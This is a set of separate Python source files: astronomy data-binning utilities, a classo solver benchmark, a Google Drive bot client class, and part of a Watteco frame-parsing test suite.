    :param wmean_pairs: Pairs of value->error columns to use for weighted means
    :type wmean_pairs: Dict, optional
    :return: Dataframe binned per day
    :rtype: DataFrame
    """
    # One group per object and per observation date (nightly bins).
    grouped_data = data.groupby(["OBJECT", "DATE-OBS"])
    if wmean_pairs is not None:
        # All columns involved in weighted means (values and their errors).
        wmean_all_cols = list(wmean_pairs.keys())
        wmean_all_cols.extend(list(wmean_pairs.values()))
        # For other columns, either use a simple mean for numbers or keep first
        no_wmean_cols = data.columns[~data.columns.isin(wmean_all_cols)]
        mean_cols = (
            data[no_wmean_cols].select_dtypes(include=np.number).columns
        )
        first_cols = (
            data[no_wmean_cols].select_dtypes(exclude=np.number).columns
        )
        # Dictionary to tell agg which function to use on which columns
        agg_funcs = {
            **dict.fromkeys(mean_cols, "mean"),
            **dict.fromkeys(first_cols, "first"),
        }
        # Perform both aggregations, then merge the simple-agg columns into
        # the weighted-mean result (get_wmean returns a row per group).
        agg_data = grouped_data.agg(agg_funcs)
        binned_data = grouped_data.apply(get_wmean, wmean_pairs)
        binned_data[agg_data.columns] = agg_data
        # We now reset the ROW index that was lost in the binning.
        # This makes the data more uniform with the pre-binning data:
        # each object gets rows numbered 0..n-1 again.
        no_date_data = binned_data.reset_index("DATE-OBS", drop=True)
        rows_per_file = no_date_data.groupby("OBJECT").size().apply(np.arange)
        rows = np.concatenate(rows_per_file)
        row_ind = pd.Index(rows, name="ROW")
        binned_data = no_date_data.set_index(row_ind, append=True)
    else:
        # No weighted means requested: mean all numeric columns, keep the
        # first value of everything else.
        mean_cols = data.select_dtypes(include=np.number).columns
        first_cols = data.select_dtypes(exclude=np.number).columns
        # Dictionary to tell agg which function to use on which columns
        agg_funcs = {
            **dict.fromkeys(mean_cols, "mean"),
            **dict.fromkeys(first_cols, "first"),
        }
        binned_data = grouped_data.agg(agg_funcs)
    return binned_data
def bin_tbl(
    tbl: Table,
    wmean_pairs: dict[str, str],
) -> Table:
    """Bin an astropy table into one row per unique DATE-OBS.

    Columns listed in *wmean_pairs* (value -> error) are combined with an
    inverse-variance weighted mean; remaining columns get a plain mean, or
    the first value when a mean is not possible (non-numeric columns).

    :param tbl: input table; must contain a DATE-OBS column
    :param wmean_pairs: value-column -> error-column mapping
    :return: new table with one row per unique date
    """
    tbl2_dict = {colname: [] for colname in tbl.colnames}
    dates = tbl["DATE-OBS"]
    udates = np.unique(dates)
    for i in tqdm(range(len(udates))):
        epoch = udates[i]
        epoch_mask = dates == epoch
        itbl = tbl[epoch_mask]
        for colname in tbl.colnames:
            if colname in wmean_pairs:
                # get value and error for this udate
                vals = itbl[colname]
                errs = itbl[wmean_pairs[colname]]
                # get error^2
                errs2 = errs ** 2
                # deal with all nans
                if np.sum(np.isfinite(errs2)) == 0:
                    value = np.nan
                    err_value = np.nan
                else:
                    # inverse-variance weighted mean and its standard error
                    value = np.nansum(vals / errs2) / np.nansum(1 / errs2)
                    err_value = np.sqrt(1 / np.nansum(1 / errs2))
                # push into table
                tbl2_dict[colname].append(value)
                tbl2_dict[wmean_pairs[colname]].append(err_value)
            # -----------------------------------------------------------------
            # if no weighted mean indication, try to mean the column or if not
            # just take the first value (error columns were already handled
            # alongside their value column above)
            elif colname not in wmean_pairs.values():
                # try to produce the mean of rdb table
                # noinspection PyBroadException
                try:
                    tbl2_dict[colname].append(np.mean(itbl[colname]))
                except TypeError:
                    tbl2_dict[colname].append(itbl[colname][0])
    tbl2 = Table()
    for colname in tbl2_dict:
        tbl2[colname] = tbl2_dict[colname]
    return tbl2
def get_obj_vals(
    data: DataFrame, obj_col: str = "OBJECT", unique: bool = False
):
    """Return the object identifiers of *data* as a numpy array.

    The identifiers are read from the index level *obj_col* when present,
    otherwise (with a warning) from the column of the same name.

    :param data: input dataframe
    :param obj_col: index level or column holding object identifiers
    :param unique: when True, return the sorted unique identifiers
    :return: ndarray of object identifiers
    :raises ValueError: if *obj_col* is neither an index level nor a column
    """
    if obj_col in data.index.names:
        ovals = data.index.get_level_values(obj_col).values
    elif obj_col in data.columns:
        msg = f"{obj_col} is not an index. " "Trying to filter with columns"
        warnings.warn(msg)
        ovals = data[obj_col].values
    else:
        raise ValueError(f"obj_col={obj_col} is not an index or a column.")
    # BUG FIX: ovals is already an ndarray in both branches above, so the
    # original `ovals.values` raised AttributeError whenever unique=False.
    return np.unique(ovals) if unique else ovals
def tt_atleast_1d(x):
    """
    Theano analogue of ``np.atleast_1d``: promote a 0-d tensor to 1-d by
    adding a broadcastable axis, and return higher-rank tensors unchanged.
    """
    return x.dimshuffle("x") if x.broadcastable == () else x
def load_config(path: Union[str, Path]):
    """Read a YAML config file and wrap it in a Box for attribute access."""
    with open(path) as ymlfile:
        return Box(yaml.safe_load(ymlfile))
def make_unique_dir(path: Union[str, Path]) -> Path:
    """Create the directory *path*, adding a timestamp suffix when it
    already exists, and return the path actually created.

    :param path: desired directory path
    :return: path of the newly created directory
    """
    base = Path(path)
    candidate = base
    while candidate.exists():
        # Timestamped suffix: blocks at most ~1 second per collision unless
        # the directory already exists for some other reason. Still probably
        # safer/clearer than _0, _1, etc.
        stamp = "_" + datetime.now().strftime("%y%m%d_%H%M%S")
        candidate = append_to_dirpath(base, stamp)
    candidate.mkdir(parents=True)
    return candidate
def save_map_dict(map_dict: dict, path: Union[Path, str], force: bool = False):
    """Serialize *map_dict* to *path* with pickle.

    :param map_dict: dictionary to store
    :param path: destination file; must end in .pkl or .pickle
    :param force: overwrite an existing file when True
    :raises FileExistsError: when *path* exists and *force* is False
    :raises ValueError: when *path* does not have a pickle extension
    """
    target = Path(path)
    if target.exists() and not force:
        raise FileExistsError(
            f"File {target} exists. Use force=True to overwrite"
        )
    pkl_ext = [".pkl", ".pickle"]
    if target.suffix not in pkl_ext:
        raise ValueError(
            "Please use one of the following file extension for a pickle"
            f" file: {pkl_ext}"
        )
    with open(target, "wb") as pfile:
        pickle.dump(map_dict, pfile)
def get_config_params(config: Box):
    """Resolve the model-parameter specification from a config Box.

    ``config.model_parameters`` may be either a dictionary (returned as-is)
    or a path to a .yml file, optionally nesting the parameters under a
    top-level ``model_parameters`` key.

    :raises ValueError: when a string path does not end in .yml
    :raises TypeError: when the value is neither a dict nor a string
    """
    model_params = config.model_parameters
    if isinstance(model_params, dict):
        return model_params
    if isinstance(model_params, str):
        if not model_params.endswith(".yml"):
            raise ValueError(
                "model_params should be a dictionary or a yml file"
            )
        params_file = Path(model_params)
        # Relative paths are resolved against the config file's directory.
        if not params_file.is_absolute():
            params_file = Path(config.config).parent / params_file
        loaded = load_config(params_file)
        if "model_parameters" in loaded:
            loaded = loaded["model_parameters"]
        return loaded
    raise TypeError(
        "model_parameters should be a dictionary or a path to a file"
    )
def get_substr_keys(
    substr: str,
    model: Optional[ZeroPointModel] = None,
    post: Optional[Dataset] = None,
    map_dict: Optional[dict] = None,
) -> list[str]:
    """Collect variable names containing *substr* from the first available
    source, checked in order: model named vars, posterior data vars, MAP dict.

    :raises TypeError: when no source is provided
    """
    if model is not None:
        candidates = model.named_vars.keys()
    elif post is not None:
        candidates = post.data_vars.keys()
    elif map_dict is not None:
        candidates = map_dict.keys()
    else:
        raise TypeError("One of model or post is required.")
    return [key for key in candidates if substr in key]
def print_data_info(
    data: DataFrame, config: Box, wn_dict: Optional[dict[str, float]] = None
):
    """Print per-object summary statistics of the RV uncertainties.

    :param data: dataframe indexed by (at least) an OBJECT level
    :param config: config Box; config.svrad_col names the RV-error column
    :param wn_dict: optional per-object white-noise terms to display
    """
    for obj in data.index.get_level_values("OBJECT").unique():
        odata = data.loc[obj]
        print(f"Info for {obj}")
        print(f"  Mean RV error: {np.mean(odata[config.svrad_col])}")
        print(f"  Median RV error: {np.median(odata[config.svrad_col])}")
        # NOTE(review): labelled "RV scatter" but computed on the error
        # column (svrad_col), not the RV column — confirm intent.
        print(f"  RV scatter: {np.std(odata[config.svrad_col])}")
        if wn_dict is not None:
            print(f"  White noise term: {wn_dict[obj]}")
def get_summary(group):
    """Summarise one per-object group: number of points, time span of the
    rjd column, RV scatter, and mean RV error.

    :param group: dataframe with rjd, vrad and svrad columns
    :return: Series with npts, range, vrad_std and svrad_mean
    """
    summary = {
        "npts": group.shape[0],
        "range": group.rjd.max() - group.rjd.min(),
        "vrad_std": group.vrad.std(),
        "svrad_mean": group.svrad.mean(),
    }
    return pd.Series(summary, index=list(summary))
|
<filename>benchmark/R2/bm-R2.py
import numpy as np
import numpy.linalg as LA
from classo import classo_problem, random_data
import cvxpy as cp
from time import time
import os
# Directory containing this script; results are saved next to it.
my_path = os.path.dirname(__file__)
# NOTE(review): 'l' appears unused in this benchmark script — confirm
# before removing.
l = [1, 2, 5, 7]
def huber(r, rho):
    """Elementwise Huber loss of residuals *r* with threshold *rho*:
    quadratic inside [-rho, rho], linear beyond it.

    :param r: residual array
    :param rho: Huber threshold
    :return: array of per-element Huber losses
    """
    outliers = abs(r) >= rho
    h = r**2
    # Linear branch for residuals beyond the threshold.
    h[outliers] = 2 * rho * abs(r)[outliers] - rho**2
    return h
def loss(X, y, lamb, rho, beta):
    """Objective value of the huberized L1-penalized regression at *beta*:
    sum of elementwise Huber losses of the residuals plus lamb * ||beta||_1.
    """
    residuals = X.dot(beta) - y
    # Inlined Huber loss: quadratic inside [-rho, rho], linear beyond.
    outliers = abs(residuals) >= rho
    h = residuals**2
    h[outliers] = 2 * rho * abs(residuals)[outliers] - rho**2
    return np.sum(h) + lamb * np.sum(abs(beta))
# Experiment configuration.
d_nonzero = 5    # non-zero coefficients in the simulated beta
sigma = 0.5      # noise level of the simulated data
lam = 0.1        # penalty strength as a fraction of lambda_max
N_per_data = 5   # repeated solves per dataset (timings are averaged)
N_data = 20      # independent datasets per problem size
S = [50, 100, 200, 500]
# Problem sizes: each square (m, m) plus the rectangular (m, next m).
SIZES = []
for i in range(len(S)):
    SIZES.append((S[i], S[i]))
    if i+1 < len(S):
        SIZES.append((S[i], S[i+1]))
N_sizes = len(SIZES)
# Result matrices, one row per problem size and one column per dataset:
# T_* = mean solve time, L_* = objective value at the averaged solution,
# C_* = constraint violation ||C beta|| (pa=Path-Alg, pds=P-PDS,
# dr=Douglas-Rachford, cvx=cvxpy reference).
T_pa = np.zeros((N_sizes, N_data))
L_pa = np.zeros((N_sizes, N_data))
C_pa = np.zeros((N_sizes, N_data))
T_pds = np.zeros((N_sizes, N_data))
L_pds = np.zeros((N_sizes, N_data))
C_pds = np.zeros((N_sizes, N_data))
T_dr = np.zeros((N_sizes, N_data))
L_dr = np.zeros((N_sizes, N_data))
C_dr = np.zeros((N_sizes, N_data))
T_cvx = np.zeros((N_sizes, N_data))
L_cvx = np.zeros((N_sizes, N_data))
C_cvx = np.zeros((N_sizes, N_data))
def _solve_classo(X, y, C, rho, lamb, method, n_runs):
    """Solve the huberized constrained lasso *n_runs* times with the given
    classo numerical method; return the stacked beta solutions."""
    betas = []
    for _ in range(n_runs):
        problem = classo_problem(X, y, C)
        problem.formulation.concomitant = False
        problem.formulation.huber = True
        problem.formulation.scale_rho = False
        problem.formulation.rho = rho
        problem.model_selection.StabSel = False
        problem.model_selection.LAMfixed = True
        problem.model_selection.LAMfixedparameters.rescaled_lam = False
        problem.model_selection.LAMfixedparameters.lam = lamb
        problem.model_selection.LAMfixedparameters.numerical_method = method
        problem.solve()
        betas.append(problem.solution.LAMfixed.beta)
    return np.array(betas)


for s in range(N_sizes):
    m, d = SIZES[s]
    for i in range(N_data):
        # Simulate a zero-sum constrained regression problem.
        (X, C, y), sol = random_data(m, d, d_nonzero, 1, sigma, zerosum=True, seed=i)
        # Huber threshold: 1.345 * RMS of y; lambda as a fraction of the
        # (outlier-restricted) lambda_max.
        rho = 1.345 * np.sqrt(np.mean(y**2))
        F = abs(y) >= rho
        lamb = lam * 2 * LA.norm(X[F].T.dot(y[F]), np.infty)
        t0 = time()
        # classo Path-Alg
        b_pa = _solve_classo(X, y, C, rho, lamb, 'Path-Alg', N_per_data)
        t1 = time()
        # classo P-PDS
        b_pds = _solve_classo(X, y, C, rho, lamb, 'P-PDS', N_per_data)
        t2 = time()
        # classo DR
        # BUG FIX: this section previously reused 'P-PDS' as the numerical
        # method; it is meant to benchmark the Douglas-Rachford ('DR') solver.
        b_dr = _solve_classo(X, y, C, rho, lamb, 'DR', N_per_data)
        t3 = time()
        # cvxpy reference solution
        b_cvx = []
        for j in range(N_per_data):
            beta = cp.Variable(d)
            objective = cp.Minimize(cp.sum(cp.huber(X@beta-y, rho)) + lamb*cp.norm(beta, 1))
            constraints = [C@beta == 0]
            prob = cp.Problem(objective, constraints)
            prob.solve(warm_start=False, eps_abs=1e-5)
            b_cvx.append(beta.value)
        b_cvx = np.array(b_cvx)
        t4 = time()
        T_pa[s, i] = (t1 - t0) / N_per_data
        L_pa[s, i] = loss(X, y, lamb, rho, np.mean(b_pa, axis=0))
        C_pa[s, i] = np.linalg.norm(C.dot(np.mean(b_pa, axis=0)))
        T_pds[s, i] = (t2 - t1) / N_per_data
        L_pds[s, i] = loss(X, y, lamb, rho, np.mean(b_pds, axis=0))
        C_pds[s, i] = np.linalg.norm(C.dot(np.mean(b_pds, axis=0)))
        # BUG FIX: DR timing previously used (t3 - t0), which also counted
        # the Path-Alg and P-PDS runs, and C_dr was computed from b_pds.
        T_dr[s, i] = (t3 - t2) / N_per_data
        L_dr[s, i] = loss(X, y, lamb, rho, np.mean(b_dr, axis=0))
        C_dr[s, i] = np.linalg.norm(C.dot(np.mean(b_dr, axis=0)))
        T_cvx[s, i] = (t4 - t3) / N_per_data
        L_cvx[s, i] = loss(X, y, lamb, rho, np.mean(b_cvx, axis=0))
        C_cvx[s, i] = np.linalg.norm(C.dot(np.mean(b_cvx, axis=0)))
# Persist all timing/loss/constraint matrices next to this script for
# later analysis/plotting.
np.savez(
    os.path.join(my_path, 'bm-R2.npz'),
    T_pa = T_pa,
    L_pa = L_pa,
    C_pa = C_pa,
    T_pds = T_pds,
    L_pds = L_pds,
    C_pds = C_pds,
    T_dr = T_dr,
    L_dr = L_dr,
    C_dr = C_dr,
    T_cvx = T_cvx,
    L_cvx = L_cvx,
    C_cvx = C_cvx,
    SIZES = np.array(SIZES)
)
|
<gh_stars>0
import os
import re
import json
import logging
from bot import LOGGER
from time import sleep
from tenacity import *
import urllib.parse as urlparse
from bot.config import Messages
from mimetypes import guess_type
from urllib.parse import parse_qs
from bot.helpers.utils import humanbytes
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from googleapiclient.http import MediaFileUpload
from bot.helpers.sql_helper import gDriveDB, idsDB
# Silence noisy INFO/WARNING chatter from the Google API client libraries.
logging.getLogger('googleapiclient.discovery').setLevel(logging.ERROR)
logging.getLogger('oauth2client.transport').setLevel(logging.ERROR)
logging.getLogger('oauth2client.client').setLevel(logging.ERROR)
class GoogleDrive:
    """Per-user Google Drive (v3 API) client used by the bot.

    Supports cloning shared files/folders into the user's configured
    parent folder, uploading local files, deleting files and emptying
    the trash. Credentials and the parent-folder id are fetched from the
    bot's SQL helpers (gDriveDB / idsDB) keyed on the user id. Methods
    that talk to the API return user-facing message strings rather than
    raising, except where noted.
    """

    def __init__(self, user_id):
        # MIME type Drive uses to mark folder entries.
        self.__G_DRIVE_DIR_MIME_TYPE = "application/vnd.google-apps.folder"
        # URL templates for direct file download and folder browsing.
        self.__G_DRIVE_BASE_DOWNLOAD_URL = "https://drive.google.com/uc?id={}&export=download"
        self.__G_DRIVE_DIR_BASE_DOWNLOAD_URL = "https://drive.google.com/drive/folders/{}"
        # Authorized Drive service built from this user's stored credentials.
        self.__service = self.authorize(gDriveDB.search(user_id))
        # Folder id everything for this user is uploaded/cloned into.
        self.__parent_id = idsDB.search_parent(user_id)

    def getIdFromUrl(self, link: str):
        """Extract the file/folder id from a Google Drive link.

        File/folder share links are matched with a regex; any other link
        is assumed to carry the id in an ``id`` query parameter.

        :raises IndexError: when a file/folder link contains no id
        :raises KeyError: when a query-style link has no ``id`` parameter
        """
        if "folders" in link or "file" in link:
            regex = r"https://drive\.google\.com/(drive)?/?u?/?\d?/?(mobile)?/?(file)?(folders)?/?d?/([-\w]+)[?+]?/?(w+)?"
            res = re.search(regex,link)
            if res is None:
                raise IndexError("GDrive ID not found.")
            # Group 5 captures the id segment of the matched URL.
            return res.group(5)
        parsed = urlparse.urlparse(link)
        return parse_qs(parsed.query)['id'][0]

    @retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
           retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
    def getFilesByFolderId(self, folder_id):
        """Return all file resources directly inside *folder_id*,
        following pagination (200 entries per page)."""
        page_token = None
        q = f"'{folder_id}' in parents"
        files = []
        while True:
            response = self.__service.files().list(supportsTeamDrives=True,
                                                   includeTeamDriveItems=True,
                                                   q=q,
                                                   spaces='drive',
                                                   pageSize=200,
                                                   fields='nextPageToken, files(id, name, mimeType,size)',
                                                   pageToken=page_token).execute()
            for file in response.get('files', []):
                files.append(file)
            page_token = response.get('nextPageToken', None)
            if page_token is None:
                break
        return files

    @retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
           retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
    def copyFile(self, file_id, dest_id):
        """Copy *file_id* into folder *dest_id* and return the new file
        resource.

        :raises IndexError: ('LimitExceeded') when Drive reports the daily
            quota is exhausted
        :raises HttpError: re-raised for any other JSON API error
        """
        body = {'parents': [dest_id]}
        try:
            res = self.__service.files().copy(supportsAllDrives=True,fileId=file_id,body=body).execute()
            return res
        except HttpError as err:
            if err.resp.get('content-type', '').startswith('application/json'):
                reason = json.loads(err.content).get('error').get('errors')[0].get('reason')
                if reason == 'dailyLimitExceeded':
                    raise IndexError('LimitExceeded')
                else:
                    raise err

    def cloneFolder(self, name, local_path, folder_id, parent_id):
        """Recursively copy the contents of *folder_id* under *parent_id*.

        Subfolders are recreated via create_directory and recursed into;
        files are copied with copyFile and their sizes accumulated in
        self.transferred_size (items without a size are skipped).

        :return: id of the last destination written to, or the user's
            parent id when *folder_id* is empty
        """
        files = self.getFilesByFolderId(folder_id)
        new_id = None
        if len(files) == 0:
            return self.__parent_id
        for file in files:
            if file.get('mimeType') == self.__G_DRIVE_DIR_MIME_TYPE:
                file_path = os.path.join(local_path, file.get('name'))
                current_dir_id = self.create_directory(file.get('name'))
                new_id = self.cloneFolder(file.get('name'), file_path, file.get('id'), current_dir_id)
            else:
                try:
                    self.transferred_size += int(file.get('size'))
                except TypeError:
                    # Some Drive items report no size; skip the accounting.
                    pass
                try:
                    self.copyFile(file.get('id'), parent_id)
                    new_id = parent_id
                except Exception as err:
                    # NOTE(review): the exception object is RETURNED, not
                    # raised, although callers treat the result as an id —
                    # confirm this is intended.
                    return err
        return new_id

    @retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
           retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
    def create_directory(self, directory_name):
        """Create *directory_name* under the user's parent folder and
        return the new folder's id."""
        file_metadata = {
            "name": directory_name,
            "mimeType": self.__G_DRIVE_DIR_MIME_TYPE
        }
        file_metadata["parents"] = [self.__parent_id]
        file = self.__service.files().create(supportsTeamDrives=True, body=file_metadata).execute()
        file_id = file.get("id")
        return file_id

    def clone(self, link):
        """Clone the file or folder behind *link* into the user's parent
        folder; return a user-facing status message string."""
        self.transferred_size = 0
        try:
            file_id = self.getIdFromUrl(link)
        except (IndexError, KeyError):
            return Messages.INVALID_GDRIVE_URL
        try:
            meta = self.__service.files().get(supportsAllDrives=True, fileId=file_id, fields="name,id,mimeType,size").execute()
            if meta.get("mimeType") == self.__G_DRIVE_DIR_MIME_TYPE:
                # Folder: recreate it locally-named under the parent and
                # recursively copy its contents.
                dir_id = self.create_directory(meta.get('name'))
                result = self.cloneFolder(meta.get('name'), meta.get('name'), meta.get('id'), dir_id)
                return Messages.COPIED_SUCCESSFULLY.format(meta.get('name'), self.__G_DRIVE_DIR_BASE_DOWNLOAD_URL.format(dir_id), humanbytes(self.transferred_size))
            else:
                # Single file: copy straight into the parent folder.
                file = self.copyFile(meta.get('id'), self.__parent_id)
                return Messages.COPIED_SUCCESSFULLY.format(file.get('name'), self.__G_DRIVE_BASE_DOWNLOAD_URL.format(file.get('id')), humanbytes(int(meta.get('size'))))
        except Exception as err:
            if isinstance(err, RetryError):
                # Unwrap tenacity's RetryError to report the real cause.
                LOGGER.info(f"Total Attempts: {err.last_attempt.attempt_number}")
                err = err.last_attempt.exception()
            # Strip angle brackets so the message renders in chat markup.
            err = str(err).replace('>', '').replace('<', '')
            LOGGER.error(err)
            return f"**ERROR:** ```{err}```"

    @retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
           retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
    def upload_file(self, file_path, mimeType=None):
        """Upload the local file at *file_path* into the user's parent
        folder (resumable upload, 150 MB chunks); return a status message
        string.

        :param mimeType: explicit MIME type; guessed from the filename
            (falling back to text/plain) when omitted
        """
        mime_type = mimeType if mimeType else guess_type(file_path)[0]
        mime_type = mime_type if mime_type else "text/plain"
        media_body = MediaFileUpload(
            file_path,
            mimetype=mime_type,
            chunksize=150*1024*1024,
            resumable=True
        )
        filename = os.path.basename(file_path)
        filesize = humanbytes(os.path.getsize(file_path))
        body = {
            "name": filename,
            "description": "Uploaded using @UploadGdriveBot",
            "mimeType": mime_type,
        }
        body["parents"] = [self.__parent_id]
        LOGGER.info(f'Upload: {file_path}')
        try:
            uploaded_file = self.__service.files().create(body=body, media_body=media_body, fields='id', supportsTeamDrives=True).execute()
            file_id = uploaded_file.get('id')
            return Messages.UPLOADED_SUCCESSFULLY.format(filename, self.__G_DRIVE_BASE_DOWNLOAD_URL.format(file_id), filesize)
        except HttpError as err:
            if err.resp.get('content-type', '').startswith('application/json'):
                reason = json.loads(err.content).get('error').get('errors')[0].get('reason')
                if reason == 'userRateLimitExceeded' or reason == 'dailyLimitExceeded':
                    return Messages.RATE_LIMIT_EXCEEDED_MESSAGE
                else:
                    return f"**ERROR:** {reason}"
        except Exception as e:
            return f"**ERROR:** ```{e}```"

    @retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
           retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
    def checkFolderLink(self, link: str):
        """Check that *link* points to an accessible Drive folder.

        :return: (True, folder_id) on success, otherwise (False, message)
        :raises IndexError: when no id can be extracted from the link
        """
        try:
            file_id = self.getIdFromUrl(link)
        except (IndexError, KeyError):
            raise IndexError
        try:
            file = self.__service.files().get(supportsAllDrives=True, fileId=file_id, fields="mimeType").execute()
        except HttpError as err:
            if err.resp.get('content-type', '').startswith('application/json'):
                reason = json.loads(err.content).get('error').get('errors')[0].get('reason')
                if 'notFound' in reason:
                    return False, Messages.FILE_NOT_FOUND_MESSAGE.format(file_id)
                else:
                    return False, f"**ERROR:** ```{str(err).replace('>', '').replace('<', '')}```"
        if str(file.get('mimeType')) == self.__G_DRIVE_DIR_MIME_TYPE:
            return True, file_id
        else:
            return False, Messages.NOT_FOLDER_LINK

    @retry(wait=wait_exponential(multiplier=2, min=3, max=6), stop=stop_after_attempt(5),
           retry=retry_if_exception_type(HttpError), before=before_log(LOGGER, logging.DEBUG))
    def delete_file(self, link: str):
        """Delete the Drive file behind *link*; return a status message
        string (never raises for API errors)."""
        try:
            file_id = self.getIdFromUrl(link)
        except (IndexError, KeyError):
            return Messages.INVALID_GDRIVE_URL
        try:
            self.__service.files().delete(fileId=file_id, supportsTeamDrives=True).execute()
            return Messages.DELETED_SUCCESSFULLY.format(file_id)
        except HttpError as err:
            if err.resp.get('content-type', '').startswith('application/json'):
                reason = json.loads(err.content).get('error').get('errors')[0].get('reason')
                if 'notFound' in reason:
                    return Messages.FILE_NOT_FOUND_MESSAGE.format(file_id)
                elif 'insufficientFilePermissions' in reason:
                    return Messages.INSUFFICIENT_PERMISSONS.format(file_id)
                else:
                    return f"**ERROR:** ```{str(err).replace('>', '').replace('<', '')}```"

    def emptyTrash(self):
        """Permanently empty the user's Drive trash; return a status
        message string."""
        try:
            self.__service.files().emptyTrash().execute()
            return Messages.EMPTY_TRASH
        except HttpError as err:
            return f"**ERROR:** ```{str(err).replace('>', '').replace('<', '')}```"

    def authorize(self, creds):
        """Build a Drive v3 service from stored credentials (discovery
        cache disabled to avoid oauth2client cache warnings)."""
        return build('drive', 'v3', credentials=creds, cache_discovery=False)
<filename>srcWatteco/_ValidationTests.py
#!python
# -*- coding: utf-8 -*-
# TODO: Continuer ce fichier de tests automatisés (pour Non reg ou autres ...)
from _TestsTools import *
# Each WTCParseBuildTest() call feeds a hex frame to the codec; calls flagged
# with ERR_SYM_EXP=True / ERR_PARSE_EXP=True are expected to fail
# (see _TestsTools — TODO confirm the exact failure semantics there).
WTCParseInit()
# XYZAcceleration
WTCParseBuildTest(STDFrame, "11 05 800F 8000 41 17 0064 03E8 0003 1B58 0136 0136 0136 0000 03E8 4E20 90 03 07")
WTCParseBuildTest(STDFrame, "1101800F80000041170064271000031B5800A000A00136000003E84E20901407")
# WTCParse("11 05 800F 8000 41 17 0064 03E8 0003 1B58 0136 0136 0136 0000 03E8 4E20 90 03 87")
WTCParseBuildTest(STDFrame, "11 0a 800f 0000 41 16 0000 0001 0000 0000 0000 0000 0000 0000 023f 0399 1522 98")
WTCParseBuildTest(STDFrame, "11 0a 800f 0003 41 14 0001 0236 0312 1b62 0236 0312 1b62 0236 0312 1b62")
WTCParseBuildTest(STDFrame, "11 06 800F 84 0001 41 8001 85A0 01 00", ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "11 06 800F 84 0001 41 8001 85A0 00")
WTCParseBuildTest(STDFrame, "11 06 800F 98 0000 41 0003 801E 06 C8 00 00000001")
# Using configuration Cluster
WTCParseBuildTest(STDFrame, "11 0A 0050 0006 41 05 01 04 0D50 04")
WTCParseBuildTest(STDFrame, "110000500004")
WTCParseBuildTest(STDFrame, "110100500004004C001F02000800500406000F800A0402040504030400000104040204050403800A00")
# Simple-Metering
WTCParseBuildTest(STDFrame, "11010052000000410C000000000002000300040005")
# Calibration
WTCParseBuildTest(STDFrame, "310000528000")
WTCParseBuildTest(STDFrame, "31010052800000410901032c100006632000")
WTCParseBuildTest(STDFrame, "510000528000")
WTCParseBuildTest(STDFrame, "51010052800000410901019e1000068f4000")
# Binary input
WTCParseBuildTest(STDFrame, "310A000C00553944f5e000E84844f5e000")
WTCParseBuildTest(STDFrame, "310A000C00553944f5e000E8B044f5e00044f5e000434944f5e000")
WTCParseBuildTest(STDFrame, "310A000C00553944f5e000E8B044f5e00044f5e000800001FFFF4944f5e000")
# Alarm report with long cause, Binary Input Count
WTCParseBuildTest(STDFrame, "118a000f0402230000000aa0d00000000a0000000001")
# Configure std report on Binary EP 5 and expected response
WTCParseBuildTest(STDFrame, "b106000f00005510000a800a01")
WTCParseBuildTest(STDFrame, "b107000f00000402")
# Configure batch report on Binary EP 5 and expected response
WTCParseBuildTest(STDFrame, "b106000f1d0402000000800a000000640000000101")
WTCParseBuildTest(STDFrame, "b107000f00010402")
# --- TIC (French utility meter telemetry) frame checks ---
# TIC CBE report
WTCParseBuildTest(STDFrame, "110A005405004119 260706082122 0000000D 0000000E 0000000F 41 414243444500", ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "110A005405004119 260607082122 0000000D 0000000E 0000000F 41 414243444500")
# TIC CBE Config report
WTCParseBuildTest(STDFrame,
"11 06 0054 00 0200 41 8001 800A" "16" + # 22 (Sum)
"260607082122" + # 6
"24060708 0000000D 0000000E 0000000F" + # 16
"")
#TIC STD
WTCParseBuildTest(STDFrame, "11 0A 0056 0100 41 1F 27000102030405 426f6e6a6f7572202100 80 45010203040506 0F 08 80000000")
# TIC STD, PRODUCTEUR
WTCParseBuildTest(STDFrame,"110a00560000411f06018010002b303231393736303635363832000219000002a10167dfac0f0f")
# TIC STD, read reporting configuration with an empty criteria descriptor
WTCParseBuildTest(STDFrame, "110900560000000041000085a00706018010002b21")
# TIC PMEPMI, STD, first 31 fields + PMAX_s and PMAX_i
WTCParseBuildTest(STDFrame,
"11 06 0057 00 0000 41 8001 800A" + "79" + #121 (Sum)
"05FFFFFFFF 090C000000FFFFFFFF" + # 14
"06 06010203040506 04 010220010203 800001 800002 800003 800004" + # 27
"800001 800002 800003 800004 04 05 8441424344 05" + # 20
"0000000A05 0000000B06 0000000C07 0000000D08" + # 20
"05 06 010101020202 FFFF" + # 10
"1000 0000000A 2000 3000 0000000B 4000 5000 0000000C " + # 22
"00000E 08 00000F 09" + # 8
"")
#TIC ICE, General:
#  CONTRAT(CString),DATECOUR(DMYhms),EA(U24),ERP(U24),
#  PTCOUR(CString),DATEPA1(DMYhms),PA1(U16),
#  PA1MN(U16),PA10MN(U16),PREA10MN(U16),TGPHI(U32),U10MN(U16)
WTCParseBuildTest(STDFrame,
"11 0A 0053 0100 41 " + "3C" + # 60 (sum)
"071F80000003FB" + # 7
"4d6f6e436f6e7472617400 010100010130 00000A 00000B " + # 23
"48434800 44455000 010100010100 0010" + # 16
"0010 0011 0012 0013 00000013 0014" + # 14
"")
#TIC ICE ICEp1:
#  DEBUTp1(DMYhms),Finp1(DMYhms),CAFp1(U16),
#  EAp1P(U24),ERPp1P(U24),ERNp1P(U24)
WTCParseBuildTest(STDFrame,
"11 0A 0053 0102 41 " + "1E" + # 29 (sum)
"A7 00 01 02 04 13 22" + # 7
"010100010120 010100010121 1001" + # 14
"800010 800011 800012" + # 8
"")
WTCParseBuildTest(STDFrame,
"11 0A 0053 0102 41 " + "21" + # 33 (sum)
